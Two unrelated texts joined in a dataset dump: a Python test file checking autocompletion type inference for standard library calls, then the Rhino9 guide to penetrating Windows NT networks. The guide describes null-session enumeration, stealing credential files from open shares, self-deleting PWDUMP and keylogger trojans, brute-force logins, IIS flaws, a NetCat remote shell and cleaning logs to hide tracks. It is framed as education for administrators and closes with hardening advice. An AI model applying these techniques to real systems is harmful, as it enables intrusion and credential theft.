text
stringlengths 29
850k
|
---|
"""
std library stuff
"""
# -----------------
# builtins
# -----------------
arr = ['']
#? str()
sorted(arr)[0]
#? str()
next(reversed(arr))
next(reversed(arr))
# should not fail if there's no return value.
def yielder():
yield None
#? None
next(reversed(yielder()))
# empty reversed should not raise an error
#?
next(reversed())
#? str()
next(open(''))
#? int()
{'a':2}.setdefault('a', 3)
# Compiled classes should have the meta class attributes.
#? ['__itemsize__']
tuple.__itemsize__
# -----------------
# type() calls with one parameter
# -----------------
#? int
type(1)
#? int
type(int())
#? type
type(int)
#? type
type(type)
#? list
type([])
def x():
yield 1
generator = type(x())
#? generator
type(x for x in [])
#? type(x)
type(lambda: x)
import math
import os
#? type(os)
type(math)
class X(): pass
#? type
type(X)
# -----------------
# enumerate
# -----------------
for i, j in enumerate(["as", "ad"]):
#? int()
i
#? str()
j
# -----------------
# re
# -----------------
import re
c = re.compile(r'a')
# re.compile should not return str -> issue #68
#? []
c.startswith
#? int()
c.match().start()
#? int()
re.match(r'a', 'a').start()
for a in re.finditer('a', 'a'):
#? int()
a.start()
#? str()
re.sub('a', 'a')
# -----------------
# ref
# -----------------
import weakref
#? int()
weakref.proxy(1)
#? weakref.ref()
weakref.ref(1)
#? int()
weakref.ref(1)()
# -----------------
# functools
# -----------------
import functools
basetwo = functools.partial(int, base=2)
#? int()
basetwo()
def function(a, b):
return a, b
a = functools.partial(function, 0)
#? int()
a('')[0]
#? str()
a('')[1]
kw = functools.partial(function, b=1.0)
tup = kw(1)
#? int()
tup[0]
#? float()
tup[1]
def my_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwds):
return f(*args, **kwds)
return wrapper
@my_decorator
def example(a):
return a
#? str()
example('')
# -----------------
# sqlite3 (#84)
# -----------------
import sqlite3
#? sqlite3.Connection()
con = sqlite3.connect()
#? sqlite3.Cursor()
c = con.cursor()
#? sqlite3.Row()
row = c.fetchall()[0]
#? str()
row.keys()[0]
def huhu(db):
"""
:type db: sqlite3.Connection
:param db: the db connection
"""
#? sqlite3.Connection()
db
# -----------------
# hashlib
# -----------------
import hashlib
#? ['md5']
hashlib.md5
# -----------------
# copy
# -----------------
import copy
#? int()
copy.deepcopy(1)
#?
copy.copy()
# -----------------
# json
# -----------------
# We don't want any results for json, because it depends on IO.
import json
#?
json.load('asdf')
#?
json.loads('[1]')
# -----------------
# random
# -----------------
import random
class A(object):
def say(self): pass
class B(object):
def shout(self): pass
cls = random.choice([A, B])
#? ['say', 'shout']
cls().s
# -----------------
# random
# -----------------
import zipfile
z = zipfile.ZipFile("foo")
# It's too slow. So we don't run it at the moment.
##? ['upper']
z.read('name').upper
|
Anche questa guida dovrebbe insegnare la penetrazione in un sistema Win NT. Difatti mostra diversi strumenti che si possono usare per l'analisi di un sistema e cosa si può evitare per mantenere sicuro un sistema.
This document is an attempt by the Rhino9 team to document the methodology and techniques used in an attack on a NT based network. The intent of this document is to educate administrators and security professionals of both the mindset of an attacker and a large set of the current NT penetration techniques. This document attempts to follow in the footsteps of the classic text, "How To Improve The Security Of Your Site by Breaking Into It" by Dan Farmer and Wietse Venema.
Obviously, this text will not contain all known methods for NT network penetration. We have tried to put together a text that Administrators can use to learn basic penetration techniques to test the vulnerability of their own networks. If the concepts and techniques presented in this text are absorbed and understood, an Administrator should have a strong base knowledge of how penetrations occur and should be able to build upon that knowledge to further protect their network.
This file is not meant for people that are new to security or NT or networking technologies. The authors assume that people reading this document have a certain understanding of protocols, server technologies and network architectures.
The authors would like to continue expanding on this document and releasing updated versions of it. We call upon all those that wish to contribute techniques to send detailed information on your own penetration testing methods. We would like to release updates to this document to keep it a current and solid resource. Send your techniques or submissions to: neonsurge@hotmail.com. Valid and useful submissions will be incorporated in to the document with proper credit given to the author.
The text is being written in a procedural manner. We have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.
The document is divided into 3 sections: NetBIOS, WebServer, and Miscellaneous, each of which explain different methods of information gathering and penetration techniques.
The initial step an intruder would take is to portscan the target machine or network. It's surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine. Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done. Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.
When attacking an NT based network, NetBIOS tends to take the brunt of an attack. For this reason, NetBIOS will be the first serious topic of discussion in this paper.
The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits. Interpretation the information can reveal more than one might think.
Switches -a Lists the remote computer's name table given its host name.
the last byte of the name converted into hex.
Associated The endpoint for a connection has been created and your computer has associated it with an IP address.
Connected This is a good state! It means you're connected to the remote resource.
Connecting Your session is trying to resolve the name-to-IP address mapping of the destination resource.
Disconnected Your computer requested a disconnect, and it is waiting for the remote computer to do so.
Idle The remote computer has been opened in the current session, but is currently not accepting connections.
Reconnecting If your connection failed on the first attempt, it will display this state as it tries to reconnect.
An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it's share of vulnerabilities, so this type of information is certainly useful to an intruder.
The next logical step would be to glean possible usernames from the remote machine. A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins. Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools (For more information about the SID tools, read appendix B).
At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine. Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user - all through a null IPC session. This information gathering ability will appear in Rhino9's soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.
The release of the WindowsNT 4.0 Resource Kit made a new set of tools available to both administrator and intruder alike. Below is a description of some of the Resource Kit Utilities that the Rhino9 team has used in conjunction with the IPC$ null session to gather information. When reading these tool descriptions and the information they provide, keep in mind that the null session that is used does NOT provide the remote network with any real credentials.
In order to fully understand what is happening in the capture, lets discuss it. Before the actual attack took place, a mapping was put into the lmhosts file that reflected the Student4 machine and it's Domain activity status using the #PRE/#DOM tags (explained in more detail below.). The entry was then preloaded into the NetBIOS cache, and a null IPC session was established. As you can see, the command is issued against the Domain name. The tool will then query the Primary Domain Controller for that Domain.
Global: This command-line utility displays the members of global groups on remote servers or domains. As discussed above, this utility is used in conjunction with an Lmhosts/IPC mapping. Shown below is an actual capture of the global tool. In the example, the "Domain Users" is a standard, default global group present in a WindowsNT domain. For this example, we have used the tool to query Domain1 for a listing of all users in the "Domain Users" group.
Local: The Local tool works just as the Global tool does, except it queries the machine for the members of a local group instead of a global group. Below is an example of the Local tool querying a server for a list of its Administrators group.
The computer \\SPUPPY is a domain controller of DOMAIN4.
The computer \\SPUPPY is the PDC of DOMAIN4.
NetWatch: NetWatch is a tool that will give the person invoking the tool a list of the shares on a remote machine. Again, this tool works with an Lmhosts/IPC mapping. The bad thing about this tool is that the Rhino9 team was able to use the tool to retrieve a list of the hidden shares on the remote machine.
Other known penetration techniques that involve the IPC share include opening the registry of the remote machine, as well as a remote User Manager for Domains technique. The IPC null connection could allow an intruder to potentially gain access to your registry. Once the null IPC session has been established, the intruder would launch his local regedit utility and attempt the Connect Network Registry option. If this is succesful, the intruder would have read access to certain regsitry keys, and potentially read/write. Regardless, even read access to the registry is undesirable from a security standpoint.
An intruder could also attempt the IPC User Manager for Domains technique. This technique is relatively unknown and often times produces no results. We are covering it because it can produce results and it can be an effective intrusion technique. This technique involves a null IPC session and entries into the LMHOSTS file. The LMHOSTS file is (normally) a local file kept on windows based machines to map NetBIOS names to IP addresses. Used mostly in non-WINS environments, or on clients unable to use WINS, the LMHOSTS file can actually be used in many different ways by an intruder. Different uses for the LMHOSTS file will be discussed later in this text, for now we will discuss how the LMHOSTS file is used in this technique.
By examining the results of the nbtstat command, we are looking for the <03> identifier. If someone is logged on locally on the machine, you will see two <03> identifiers. Normally the first <03> listed is the netbios name of the machine and the second <03> identifier listed is the name of the locally logged on user. At this point the intruder would put the netbios name and ip address mapping of the machine into his local LMHOSTS file, ending the entry with the #PRE and #DOM tags. The #PRE tag denotes that the entry should be preloaded into the netbios cache. The #DOM tag denotes domain activity. At this point the intruder would issue a nbtstat -R command to preload the entry into his cache. Technically, this preloading would make the entry appear as if it had been resolved by some previous network function and allow the name to be resolved much quicker.
Next the intruder would establish a null IPC session. Once the null IPC session has been succesfully established, the intruder would launch his local copy of User Manager for Domains and use the Select Domain function in User Manager. The Domain of the remote machine will appear (or can manually be typed in) because it has been pre-loaded into the cache. If the security of the remote machine is lax, User Manager will display a list of all the users on the remote machine. If this is being done over a slow link (i.e. 28.8 modem) it will normally not work. On faster network connections however, this tends to produce results.
Now that the intruder has gathered information about your machine, the next step would be to actually attempt a penetration of that machine. The first penetration technique to be discussed will be the open file share attack. The intruder would couple the previously discussed net view command with a net use command to accomplish this attack.
Taking the net view from above, lets discuss the attack.
This attack will only work if the share is unpassworded or shared out to the everyone group (NOTE: The Everyone group means Everyone. If someone connects as a null user, they are now part of the everyone group.). If those parameters are in place, the attacker would be able to map a network drive to your machine and begin what could amount to a severe series of penetration attacks. Keep in mind that the intruder is not limited to mapping drives to the shares displayed by the net view command. An intruder that knows NT or has done his homework knows that NT has hidden administrative shares. By default, NT creates the IPC$ share and one hidden share for every drive on the machine (i.e. a machine that has C, D, and E drives would have corresponding hidden shares of C$, D$, and E$). There is also a hidden ADMIN$ share that maps directly to the installation path of NT itself (i.e. If you installed NT on C:\winnt, than ADMIN$ maps to that exact portion of that drive). One thing that the Rhino9 team has noticed about the majority of the NT security community is that they seem to be oblivious to the concept of penetrating one internal NT machine from another internal NT machine. The Rhino9 team, during our professional audits, has accomplished this task many times. Chances are, if the intruder is good and can gain access to one of your machines, he will worm his way into the rest of your network. For that reason, these share attacks can pose a serious threat.
At first, someone may not be able to see the dangers of someone having access to your hard drive. Access to the hard drive opens up new avenues for Information Gathering and Trojan/Virus planting. An attacker would normally look for something that could possibly contain a password or highly sensitive data that he could use to continue digging his way into your network. Some of the files that a intruder will look for and use are listed below, each with a brief description of what it is, and how it would be used.
Eudora.ini: This file is used to store configuration information for eudora e-mail software. An easily obtainable tool called eudpass.com will extract the individuals username and password information as well as all the information that the attacker needs to begin eavesdropping on the users mail. At this point, the intruder could configure his own e-mail software to read the targets mail. Again, some could have a hard time seeing the dangers in this, but remember that generally, people are creatures of habit. The chances that the user's e-mail password is the same password they use to log into the network at work are relatively high. Now all the attacker needs to do is keep snooping around on the users hard drive for a resume or some other work related document to point him in the direction of the persons place of business, allowing him to launch a somewhat strong initial strike against the network.
Tree.dat: This is the file that is used by the popular software CuteFTP to store the users ftp site/username/password combinations. Using a program called FireFTP, the attacker can easily crack the tree.dat file. So, as above, the user could keep gathering information about you and launch an attack against your place of business. Not to mention that if you have an ftp mapping in your tree.dat that maps directly to your place of business, his attack has now become much easier.
PWL: PWL's generally reside on Win95 machines. They are used to store operation specific passwords for the Windows95 end user. A tool called glide.exe will crack (with less than desirable efficiency) PWL files. There is also documentation available on how to manually crack the encryption of these PWL files using a calculator. Continuing the scenario, the attacker could keep gathering information about the user and formulate an attack.
PWD: PWD files exist on machines running FrontPage or Personal Webserver. These files include the plain text username and an encrypted password matching the credentials needed to administer the website. The encryption scheme used for these passwords is the standard DES scheme. Needless to say, many DES cracking utilities are available on the internet. John the Ripper by Solar Designer very efficiently cracks these passwords.
IDC Files: IDC (internet database connecter) files are normally used for back-end connectivity to databases from a webserver. Becuase this type of connection generally requires authentication, some IDC files contain username/password combinations, often times in clear text.
waruser.dat: This is one of the config files for WarFTP, the popular Win32 FTP server. This particular dat file could contain the administrative password for the FTP server itself. From what the authors have been able to find out, this only occurs in beta versions of WarFTP 1.70.
$winnt$.inf: During an unattended installation of WindowsNT, the setup process requires information files. As residue of this unattended installation process, a file called $winnt$.inf could exist in the %systemroot%\system32 directory. This file could contain the username and password combination of the account that was used during the installation. Because the account used in these types of installations normally require some strong permission sets on the network, this is not a trivial matter.
Sam._: Although people have known for a long time that the SAM database could present a problem if it fell into the wrong hands, many people forget about the sam._. Many would-be intruders have asked themselves how they could copy the SAM database if they could mount a drive across the net. Well, normally this is not possible, because the NT server you are connected to is running, and while it is running, it locks the SAM. However, if the administrator has created an emergency repair disk, a copy of the SAM should be located in the %systemroot%\repair\ directory. This file will be named sam._. This copy, by default is EVERYONE readable. By using a copy of the samdump utility, you can dump username/password combinations from the copied SAM.
Needless to say, the file contains information that an intruder could easily use to further compromise the integrity of your network.
Profile.tfm: Profile.tfm is a file that is created by the POP3 client software AcornMail. At the writing of this document, AcornMail began getting alot of attention from the internet community. Upon inspection of the software, we found that it's an efficient POP3 client, but the installation is not NTFS friendly. After the installation of the software, we began to check into the files that AcornMail created. We found that the Profile.tfm file held the username/password combination. At first, we decided the software was somewhat ok, because it did indeed store the password in an encrypted state. We then realized that the permissions on the profile.tfm file were set to Everyone/Full Control. This causes problems because anyone could obtain a copy of the file and plug this file into their own AcornMail installation. Then intruder coud log on with the stored information. Below is a capture in Network Monitor of just that.
00000000 00 01 70 4C 67 80 98 ED A1 00 01 01 08 00 45 00 ..pLg.........E.
00000020 DD 91 00 6E 04 44 F6 1E 84 D6 00 32 51 EB 50 18 ...n.D.....2Q.P.
00000040 72 64 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 rd.required.for.
00000000 98 ED A1 00 01 01 00 01 70 4C 67 80 08 00 45 00 ........pLg...E.
00000020 C0 53 04 44 00 6E 00 32 51 EB F6 1E 84 F8 50 18 .S.D.n.2Q.....P.
00000040 37 33 0D 0A 63..
As you can see, the username/password is indeed passed in clear text. This is not a fault of AcornMail, but something that has been present in the POPvX. This 'data' file swapping/packet sniffing type of technique has been tested by the Rhino9 team on numerous software titles, so this attack is not limited to AcornMail.
Now that we have discussed the files an intruder may wish to acquire if he gains access to your hard drive, lets discuss Trojan planting. If there is one thing that can gain an attacker a ton of information, it is trojan planting. The open file share attack generally makes trojan planting extremely easy to do. One of the easiest and most informative trojans to use is the PWDUMP utility wrapped in a batch file. If prepared correctly, the batch file will execute minimized (also named something clever, such as viruscan.cmd), run the PWDUMP utility, delete the PWDUMP utility after it has run its course, and finally erase itself. This generally leaves little evidence and will create a nice text file of all of the username/password combinations on that machine.
Rules of the trick: The target must be an NT machine and the end user executing the trojan must be the administrator, so the attacker drops the batch file into the Administrators start-up folder and waits. The next time the Administrator logs in to the machine, the batch file executes and dumps the username/password combinations. Then the attacker connects back into the machine via file sharing and collects the results.
Another solid attack an intruder might try is to place a keylogger batch into the start-up folder. This can usually be done to any user, not just the administrator. This will glean all keystrokes issued by that user, minus initial logon credentials (due to the NT architecture, which stops all user mode processes during login). The attacker then connects back to the target machine at a later time and collects the recorded keystrokes.
One of the deadliest trojan attacks issued is a batch file that runs as Administrator and sets up a scheduled event using the AT command. Because the AT command can execute as System, it can create copies of the SAM database and the registry. Imagine the fun an attacker can have with that one.
How does one prevent such attacks? By not sharing items to the everyone group, and by enforcing strong password schemes in your environment. If an intruder comes across a server that prompts him for credentials at every turn, chances are the intruder will become frustrated and leave. Other, more persistant intruders, will continue on with a Brute Force Attack.
Undoubtedly the most common tool for Brute Force NetBIOS attacks is NAT. The NAT (NetBIOS Auditing Tool) tool will allow a user to automate network connection commands using a list of possible usernames and passwords. NAT will attempt to connect to the remote machine using every username and every password in the lists provided. This can be a lengthy process, but often times an attacker will use a shortened list of common passwords and call it quits. An accomplished intruder will construct his list of usernames by using the information gathering techniques discussed above. The password list the intruder will use will also be constructed from gleaned information. Starting with a bare bones list of passwords, and creating the rest based on the usernames. It comes as no surprise to security professionals to find passwords set to the username.
An attacker can specify an IP addresses to attack or he can specify an entire range of IP addresses. NAT will diligently work to accomplish the task, all the while generating a formatted report.
Below is an actual results file of a real NAT attack across the internet. Although permission was given for the Rhino9 team to perform this attack, the IP address has been changed to protect the test target.
If you look closely at the results, you can clearly see the CONNECTED message which informs the attacker that the tool found a valid Username/Password combination. At this point, the intruder would just manually re-connect to that machine using the newly found username/password combination and launch his attack.
This is the end of the remote penetration via NetBIOS section. Keep in mind that the techniques discussed above are neither static nor stand-alone. An intruder who has spent time learning how to penetrate NT based networks will become extremely creative and use not only the techniques above, but personal variations of those techniques.
Information gathering and remote penetration via a webserver is well known today due to the population explosion on the internet and the resulting dissemenation of information. When discussing remote penetration and information gathering on NT Webservers, we will focus on Internet Information Server, the webserver that comes bundled with NT4.
Some of the information to be discussed will be somewhat outdated. We have included it due to the fact that during professional audits, the Rhino9 Team has come across companies that are still running older versions of software titles in their production environments.
Lets begin by discussing information gathering techniques. We will discuss ways of getting information about the webserver under attack, as well as using the webserver to get information that could be used in other types of attacks.
First we will discuss how one would retrieve the webserver software package and version on the target machine. Someone that is new to the security community might wonder why one would want the webserver version of the target machine. Every different version and distribution of software has different vulnerabilities attached to them. For this reason, an intruder would want to know the webserver software and version in question.
The oldest technique used to acquire webserver software and version is to telnet to the target machine on the HTTP port. Once a telnet connection has been established, issuing a simple GET command would allow one to view the HTTP header information, which would include the webserver software and version being used.
One who is not prone to using telnet, or does not wish to parse through the header information can use a couple of available tools. The first, and probably most popular tool amongst non-accomplished intruders is Netcraft. An intruder can visit www.netcraft.com and use their query engine to retrieve the webserver information from the remote target. Netcraft can also be used retrieve all known webserver hostnames. For example, if we wanted to find all of the webservers that belong to the someserver.com domain, we could use Netcraft's engine to query *.someserver.com, and it would return a listing of all of the webserver hosts in that domain. Other tools that can be used to retrieve webserver version include 1nf0ze by su1d and Grinder by horizon of Rhino9 (URLs to all tools discussed in this text can be found at the end of this document).
Once the intruder has determined what webserver package he is up against, he can begin to formulate an attack plan. By using the techniques discussed below, the intruder could gain access to the server or gain information from the server to use in other attacks. Understand that this section is in no way a complete representation of all attacks, just the more common and well known ones.
The .bat and .cmd BUG is a well-known bug in Netscape server and described in the WWW security FAQ Q59. The implementation of this bug in Internet Information Server beats all scores.
3) IIS Web server maps .bat and .cmd extensions to cmd.exe.
1) IIS Web server allows a hacker to execute his "batch file"
single command can be executed.
COMMAND[N], nothing will be logged by IIS Web server.
If you are having trouble seeing exactly what is going on in this situation, an intruder could use the above attack sequence to create and execute files server side. This could have really drastic results depending on the skill level and intent of the attacker. Luckily, most production environments are no longer running versions of Internet Information Server old enough to still be affected by this flaw.
WindowsNT installations of Internet Information Server require some type of account to be used for authentication on the box for public visits. If this account was not present in some fashion, every visitor to the site would be required to present credentials. This would not be a very effective or efficient way to present a public website. On Internet Information Server, the account to be used is the IUSR_<computername> account. This account and its accompanying password are created during installation. By default, this account is a member of the everyone group, and by default the everyone group has read access to everything on an NT drive. This fact coupled with the above mentioned flaw's ability to break out of the webroot could lead to major security breaches.
When this flaw first appeared, many people in the community ignored it and gave it no serious thought. Soon after, a public release was made documenting the exact steps an intruder would take to obtain a copy of the repair SAM. The release including the above URL flaw as part of its overall attack.
When Microsoft released Internet Information Server 3.0, it brought active server page technology to the world. This release also opened the gates to a new stream of flaws that affected IIS and NT4.
Active server pages brought simple, dynamic webpages to the Microsoft world. Active Server Pages can be used in many different ways, such as database connectivity, indexing and searching documents, authentication, and simple graphics rotation for those annoying advertisement banners.
The concept of active server pages was actually pretty creative. The HTML code would include imbedded script code that would execute server side and produce dynamic content for the end user. With this new technology widely available, it was not long until the first flaw was released to the public. This first flaw, dubbed the 'dot flaw', would allow an intruder to actually view the script without the server executing it.
This attack would display the unexecuted code in the attackers web browser. Needless to say, the script code could contain sensitive information, such as a username/password combination to remotely connect to a database. This type of information, among other things, is not something that one would want an intruder getting their hands on.
Everyone involved in the security community has a feeling that these will not be the last script displaying methods to emerge in the near future. As these scripts become more and more commonplace, they will contain more and more sensitive information. These simple exploits could lead to an intruder easily gleaning sensitive information.
When it comes to gleaning information from IIS, perhaps one of the most popular and easiest of the attacks is the Index Server attack. Index Server is a small compact search engine module that was included with Internet Information Server version 3.0. This module gives webmasters the ability to provide visitors to their site with a searchable interface for searching the contents of the website. Although there are no inherent problems with Index Server itself, problems arise out of a lack of education on the part of the admin or webmaster. Index Server is not difficult to understand, setup and mantain, although its use of catalogs and scopes can lead to an admin misconfiguring the permissions and searchable content. This misconfiguration could lead to an intruder gaining access to information he would normally have a much more difficult time getting.
This would instruct Index Server to search through its catalog of indexed data for any files ending with that file extension. Keep in mind that this file extension is not limited to extensions that Index Server understands. If Index Server encounters a file type it does not understand, it will treat it as a binary and index the filename, extensions, date, and other attributes. This means that an intruder could search for anything, including *._, which could bring up the repair sam. The interesting thing about Index Server is that unlike other full blown internet search engines, Index Server will not display a file for which the requester does not have permission to access. In other words, if Index Server returns the fact that it found a file, then the file is accessable.
If the admin has somehow misconfigured the permissions on this interface, then an intruder could gain unauthorized access to the web server with administrative functions. If successful, the intruder would be presented with an HTML interface to an administrative tool. Because of the way IIS and NT handles permissions, it is possible for the intruder to gain access to the interface but not have the proper permissions to actually do anything with it. So if you are auditing your own network, be sure to attempt a minor change to ensure that there is a problem.
In late '97 and early '98 an enormous amount of webserver hacks were performed. A large number of those hacks had one thing in common: the webservers were running Microsoft Frontpage Extensions. Frontpage Extensions are little 'web bots', if you will, that allow the author or administrator of the website to perform complex or involved tasks with relative ease.
The problem with the Frontpage Extensions was that a default Frontpage installation was not secure, especially in the unix version. An alarming number of the servers supporting these extensions had been left unpassworded or enabled administrative rights to the Everyone group. Again, the everyone group means everyone, including anonymous connections.
We will dive into the first Frontpage attack with a discussion of an attack using the actual Frontpage client software.
If the server is unpassworded or if permission is granted to the everyone group, Frontpage will open the remote site for you, and allow you to alter it. The attack really is this simple. If the extensions are set up correctly, a username/password dialogue would appear. The intruder may attempt some basic combinations such as administrator/password, but chances are the intruder won't bother, and will move on.
An intruder could also use the same "open frontpage web" trick to get a complete user listing. This could be used in brute force attacks later. Documentation circulated explaining that to stop the gleaning of usernames this way, one should create a restriction group as FP_www.yourdomain.com:80. This new restriction group indeed works, unless the intruder uses the IP address of your server instead of the domain name.
Although the frontpage password file is encrypted, it is encrypted with standard DES, so any DES cracker can glean it after proper file doctoring. An intruder may also poke around the other _vti directories, as sometimes these can hold sensitive information. After the username is known and the password has been cracked, the intruder could then re-connect with his copy of Frontpage and provide it with the credentials, or the credentials could be used in other ways, such as mapping a network drive, provided the same username/password combination would work in that context.
The server will then be more than happy to execute the file for the visitor of the site.
It may seem as though there could be countless variants of the same attack type that could issue similar results. Sadly enough, that is a somewhat accurate statement. Many of these flaws are found by people playing with variants of previous flaws, but not all flaws affecting NT web services come from Internet Information Server.
There are other web server software packages that will run on NT, like the well known Apache web server. Of course, with these third party web server packages and seperately released scripts that run on these third party packages, new flaws are bound to show up.
Webcom Datakommunikation released a cgi script that would allow visitors of a website to sign a guestbook. The name of the cgi script is wguest.exe. By issuing the proper commands, this little cgi script allows an attacker to view any text file on your server.
Template.htm here is the file that will be displayed by wguest.exe after the user has entered his information. To exploit this an attacker views the source and saves the document to his desktop and edits this line by changing the path to whatever file he wants to view, eg.
He then clicks on "Submit" and then wguest.exe will display this file. This was not tested with pwl files. However the attacker must know the exact path of the file he wishes to view.
The next small item in this section has to do with Netscape Enterprise Server. Some versions of the software react to the ?PageServices parameter by allowing users access to a directory listing. http://www.site.net/?PageServices is how this would be done.
Finally a word on FTP. FTP can be a secure thing. Tons of people will argue that platforms and version dependancy make it more secure, and for the most part this is true. Most seasoned security profressionals will tell you that version and platform do not amount to anything without an educated end admin. We are adding this quick note in here due to the number of servers Rhino9 has been able to penetrate based on FTP permissions. Some admins will not notice, or understand, the "Anonymous world writable" privs on their webserver. Rhino9 has questioned and worked its way into an entire network via one misconfigured FTP server.
It is not difficult to upload NetCat via anon-ftp-writable to a server, execute it via URL, and bind it to a port. From that point on, you have a remote 'shell' on the NT box. By connecting to that remote NetCat bind, keep in mind that all command line functions issued from that shell seem to be sent from THAT SHELL, with the NetCat binding running in the context of an internal user.
At this prompt, you could issue a seperate telnet command or take advantage of the WinGates SOCKS ability to establish other connections. While the developer of this software product was quick to release fixes and bulletins for this, the next release also had problems.
Or, the intruder would get a listing of the wingate machines hard drive. Keep in mind, that this is a default install and can easily be fixed by chaning the default install configuration.
Create a user xyz on your NT domain with an Exchange 5.0 server with POP3 service. Set xyz's password to a1234. Things work fine so far. Now change xyz's password to b5678. You will find that POP3 mail clients can log in using either password a1234 or b5678 for user xyz. Now change the password to something else. You will find that a POP3 client (or direct telnet to port 110) will allow you to log in as xyz using any of the three passwords. They all work. The Exchange 5.0 service POP3 connector caches passwords in a non-hashing mechanism so that all the passwords remain active. This does not affect the new web page interface to get your mail which uses a different authentication. Nor does it affect NT logons. In non-POP3 logins, the passwords are not cached (except NNTP and LDAP). As you can see, the caching problem can be very serious in certain environments.
On some mail systems, the intruder would be required to go through the HELO sequence first, but this is extremely trivial. Needless to say, this could lead to an intruder gathering a list of valid usernames to use in other attacks.
The authors of this document have three other documents planned for release in the near future, all of them part of the NT WarDoc series. We have an indepth Denial of Service paper in the works, Local Penetration Techniques paper, and a paper dealing with techniques one could use to gaurd against the topics of the other papers. We look forward to feedback from the community.
Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
Net Computer: This adds or deletes computers from a domains database.
Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.
Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.
Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.
Net Helpmsg message#: Get help with a particular net error or function message.
Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
Net Name: This command shows the names of computers and users to which messages are sent on the computer.
Net Pause: Use this command to suspend a certain NT service.
Net Print: Displays print jobs and shared queues.
Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
Net Statistics Server or Workstation: Shows the statistics log.
Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service may stop other services.
Net Time: This command is used to display or set the time for a computer or domain.
Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.
Net View: This command displays a list of resources being shared on a computer. Including netware servers.
Now we know all the subauthorities for the current domain. Domain accounts only differ by the last number of the SID, called a RID.
Now it is possible to look up all the domain accounts from the very first one (RID = 1000 for the first account, 1001 for the second and so on, RIDs are never used again for the current installation).
Remember that the anonymous account is also part of the Everyone group. It also happens that the anonymous account is not audited by the logon/logoff feature.
Below is an example of what you can learn provided the netbios ports are open (the listing is fictional).
net use \\131.107.2.200\ipc$ "" /user:""
/_vti_inf.html Ensures that frontpage server extensions are installed.
/_vti_pvt/service.pwd Contains the encrypted password files. Not used on IIS and WebSite servers.
/_vti_pvt/authors.pwd On Netscape servers only. Encrypted. Names and passwords of authors.
/_vti_log/author.log If author.log is there it will need to be cleaned to cover an intruders tracks.
ALERTER: Relies on NetBIOS over TCP/IP for network communication. This service allows a user to receive messages from other machines. These messages could be warnings or some type of pre-determined network information. I recommend disabling the Alerter service on machines due to its NetBIOS dependancy and the fact that it is hardly ever used.
CLIPBOOK SERVER: Relies on NetBIOS over TCP/IP for network communication. This server service allows the contents of the clipboard to be shared over a network. Few use it, and it should be disabled due to the ability of a remote intruder possible gleaning information from it.
COMPUTER BROWSER: The Computer Browser service allows one to view available network resources by browsing via Network Neighborhood. When active on a server, the server will register its name through a NetBIOS broadcast or directly to a WINS server. I recommend disabling this service.
DHCP CLIENT: This service should be set to automatic if the machine is a dhcp client, if not, disable it.
DIRECTORY REPLICATOR: This service allows NT systems to import and export directory contents. If you content replication is not needed, disable this service.
EVENT LOG: I recommend always using this service because it is the service responsible for logging activity on the server, including security activity.
LICENSE LOGGING SERVICE: Used to track use of licenses by different applications, it does not have any serious impact on the network and should be set to automatic (which is the default setting).
MESSENGER SERVICE: Relies on NetBIOS over TCP/IP for network communication. Similar to the Alerter service in both design and function. I recommend stopping this service to prevent username enumeration via NBTSTAT commands.
NET LOGON: This service is used by both Server and Workstation to provide for user authentication. TSERhis service is said to be required at all times and runs as the built in SYSTEM user.
NETWORK DDE and DDE DSDM: These service provide dynamic data exchange. DDE is used for such applications as Chat (thats important!), and other applications that may require this type of functionality. These services are considered to be a moderate risk due to their TCP connection accepting states.
NETWORK MONITOR AGENT: Network Monitor Agent is used to monitor, or sniff, the traffic passing through a network adapter card. If the SMS version of this software is in use, an administrator can remotely monitor traffic on other network adapter cards.
NT LM SECURITY SUPPORT PROVIDER: This service is present to help with backwards compatibility and authentication with older software packages.
PLUG AND PLAY: Used to configure PnP devices.
REMOTE PROCEDURE CALL LOCATOR AND SERVICES: RPC is a protocol that is used to encapsulate fucntion calls over a network. Its defualt configuration, automatic, is standard and should be left alone. This service is considered to pose a high security risk, but the dependancies existing on this service are too great to disable it.
ROUTING AND REMOTE ACCESS SERVICE: This is an add-on service that enhances the functionality of WindowsNT. If you are using a modem to dial-out of your NT system, this service should be set to automatic. If you are using its routing features, also set it to automatic.
SCHEDULE: This service allows an application to be executed at a pre-specified time and date. This can pose a serious security threat as this service can be used to start applications under the SYSTEM context.
